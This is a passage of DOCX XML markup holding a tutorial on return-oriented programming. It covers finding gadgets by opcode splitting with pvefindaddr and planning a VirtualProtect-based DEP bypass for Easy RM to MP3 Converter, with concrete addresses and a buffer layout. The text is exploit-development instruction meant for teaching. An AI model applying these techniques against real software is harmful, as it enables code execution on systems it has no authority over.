      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This may sound a bit vague, so I’ll give you an example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Let’s say you found a RET at 0x0040127F  (opcode 0xC3).  In the debugger CPU view, the instruction before the ret is ADD AL,0x58 (opcode 0x80 0xc0 0x58). So you have found a gadget which will add 0x58 to AL and then returns to the caller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3362325" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Image14" descr="">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a:hlinkClick r:id="rId66"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3362325" cy="1733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>These 2 instructions can produce another gadget, by splitting the opcode of the ADD instruction. The last byte of the ADD instruction is 0x58. And that’s the opcode for POP EAX.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That means that there is a second rop gadget, starting at 0x0040127E :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2533650" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Image15"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a:hlinkClick r:id="rId68"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2533650" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You may not have discovered this one if you have been looking for RETs and then looking at the previous instructions in the debugger view.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to make your life a little bit easier, I have written a function in pvefindaddr, which will</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">look for all rets (RETN, RETN 4, RETN 8 and so on), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">look back (up to 8 instructions), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">and will do "opcode splitting" to find new gadgets, ending with the same RET </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So all you have to do, to build your set of rop gadgets, is running !pvefindaddr rop, and it will give you a huge number of rop gadgets to play with.  And if your pointers (rop gadgets) should be null byte free, then simply run "!pvefindaddr rop nonull".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The function will write all ROP gadgets to a file "rop.txt" into the Immunity Debugger program folder.  Note that this operation is very CPU intensive, and it can take </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>up to a day</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to generate all gadgets (depending on the number of loaded modules).  My advise is to find the modules you want to use (!pvefindaddr noaslr) and then run !pvefindaddr rop </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You can create the rop gadgets from a specific module by specifying the module name  (for example :  "!pvefindaddr rop MSRMfilter03.dll")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5229225" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Image16" descr="">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a:hlinkClick r:id="rId70"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5229225" cy="2771775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Note : "!pvefindaddr rop" will automatically ignore addresses from ASLR modules or modules that might get rebased. This will help ensuring that the result (rop.txt) only contains pointers that should result in a more or less reliable exploit. If you insist on including pointers from those modules, you’ll have to manually run !pvefindaddr rop </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="call"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr/>
        <w:t>"CALL register" gadgets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>What if you are looking for a particular instruction, but can’t seem to find a gadget that ends with a ret ?  What if you have performed a search for the instruction in your favorite loaded module, and discovered that the only one you could find, has a "CALL register" instruction before the RET ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Not all is lost in this case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First of all, you should find a way to put a meaningful pointer in that register. Just have a pointer sit on the stack and find yourself a gadget that will put this value into the register.  That will make sure that the CALL reg instruction will actually work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This pointer could be just a RET, allowing you to do as if the CALL instruction never existed.  Or you can simply use a pointer to another rop gadget to continue your rop chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>pvefindaddr rop will also list gadgets that have a call reg instruction before the RET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="gotcha"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr/>
        <w:t>Gotcha. But how/where exactly do I start ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The first things you have to do, before writing a single line of code, is setting your strategy, by asking yourself the following questions :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">What technique (Windows API) will I use to bypass DEP and what are the consequences in terms of stack setup / parameters that need to be created on the stack. What is the current DEP policy and what are your options in terms of bypassing it ? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">What are the rop gadgets I can use ?  (This will be your toolbox and will allow you to craft your stack.) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">How to start the chain ? How to pivot to your controlled buffer ?  (In a direct RET exploit, you most likely control ESP, so you can simply overwrite EIP with a pointer to RETN to kick start the chain) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">How will you craft the stack ? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Answers :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Technique : In this example, I will use VirtualProtect() to modify the protection parameters of the memory page where the shellcode is located. You can obviously use one of the other DEP-policy-compatible functions, but I will use VirtualProtect() in this example. This function requires the following parameters to sit at the top of the stack when the function gets called : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">return address. After the VirtualProtect() function has finished, this is where the function will return to.  (= pointer to the location where the shellcode is placed. Dynamic address, will need to be generated at runtime (rop)) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">lpAddress : pointer to the location where the shellcode is placed. This is a dynamic address that will need to be generated at runtime (rop) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Size : speaks for itself, will need to be generated at runtime (unless your exploit buffer can deal with null bytes, but that is not the case with Easy RM to MP3) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">flNewProtect : new protection flag. This value must be set to 0x20 to mark the page executable. This value contains null bytes, so this value may have to be generated at runtime as well </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">lpflOldProtect : pointer, will receive the old protection flag value. This can be a static address, but must be writeable. I’ll take an address from one of the modules from Easy RM to MP3 Converter (0x10035005) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ROP gadgets : !pvefindaddr rop </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Start the chain : pivot to the stack. In this example, it’s a direct RET overwrite, so we just need a pointer to RET. We already have a working pointer (0x100102DC) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Crafting the stack can be done in various ways. You can put values into registers and them push them onto the stack. You can have some values sit on the stack and write the dynamic ones using a sniper technique. Building this logic, this puzzle, this Rubik’s cube, is probably the hardest part of the entire ROP building process. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Our encoded shellcode ("spawn a messagebox") will be around 620 bytes and will be initially stored somewhere on the stack. (We’ll have to encode our shellcode because Easy RM to MP3 has some character limitations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Our buffer / stack will look something like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">junk </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">eip </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">junk </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">rop chain to generate/write the parameters </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">rop chain to call the VirtualProtect function </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">more rop / some padding / nops </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">shellcode </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">junk </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>and at the time the VirtualProtect function is called, the stack is modified (by the rop chain) to look like this :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
